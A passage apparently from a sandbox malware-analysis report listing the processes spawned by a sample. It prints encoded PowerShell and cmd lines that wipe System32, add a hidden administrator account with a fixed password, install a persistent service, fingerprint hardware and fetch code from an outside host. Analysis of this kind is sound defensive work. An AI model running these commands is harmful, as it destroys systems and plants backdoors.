0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGJump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo | Select-String \"OS Name\",\"OS Version\";"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
        Source: C:\Windows\Temp\myRdpService.exeProcess created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
